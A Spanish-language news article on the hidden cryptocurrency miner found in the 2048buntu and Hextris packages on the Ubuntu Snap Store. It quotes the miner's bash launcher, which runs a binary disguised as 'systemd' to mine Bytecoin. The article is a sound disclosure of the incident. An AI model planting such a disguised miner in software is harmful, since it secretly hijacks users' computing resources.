Malware encontrado en la tienda Snap de Ubuntu

Malware encontrado en la tienda Snap de Ubuntu

Oh, Snaap! El hecho de que algunos paquetes estén disponibles para instalarse directamente desde el Centro de Software de Ubuntu no los hace seguros. Esto es demostrado por un reciente descubrimiento de malware en algunos paquetes instantáneos de la Tienda Snaps de Ubuntu.

Al menos dos de los paquetes snap, 2048buntu y Hextris, cargados en la Tienda Snaps de Ubuntu por el usuario Nicolas Tomb, contenían malware. Desde entonces, todos los paquetes de Nicolas han sido eliminados de la Tienda Snaps de Ubuntu, "en espera de nuevas investigaciones".

El informe proviene de un error que menciona que el paquete de instantánea 2048buntu (y otros paquetes de Nicolas Tomb) contiene un minero oculto de criptomoneda dentro. Puedes ver el script de inicio a continuación:

#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u [email protected] --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u [email protected] --$currency 1
else
    /snap/$name/current/systemd -u [email protected] --$currency 2
fi
}

Sí, el minero usó [email protected] en el guión minero. Supongo que todo lo que quería era un Ferrari.

2048buntu-juego-ubuntu-snap-store

Un aspecto interesante es que Nicolas Tomb usó una licencia propietaria para al menos algunas de sus instantáneas. Por ejemplo, el complemento 2048buntu se envió como propiedad. El juego en cuestión, 2048, usa una licencia de MIT que permite distribuirlo como propietario, sin hacer que el código fuente esté disponible, siempre que se conserven los avisos de derechos de autor.

2048buntu se eliminó de la tienda Snap de Ubuntu, pero puede consultar su página a través de la cache de Google. Pero ya no podemos ver el contenido del paquete (a menos que esté en GitHub en algún lugar, pero no se puede encontrar).

¿Cómo fue esto posible?

Bueno, la Tienda Snap de Ubuntu le permite a cualquiera cargar paquetes instantáneos, a diferencia de los paquetes (deb) disponibles en los repositorios oficiales de Ubuntu. El motivo es proporcionar paquetes más fáciles de instalar a sus usuarios.

¿Cuál es tu opinión con respecto a esto? ¿Crees que cada vez más malware llegará a los usuarios al permitir que alguien cargue paquetes en la tienda de Ubuntu, o se trató de un incidente aislado?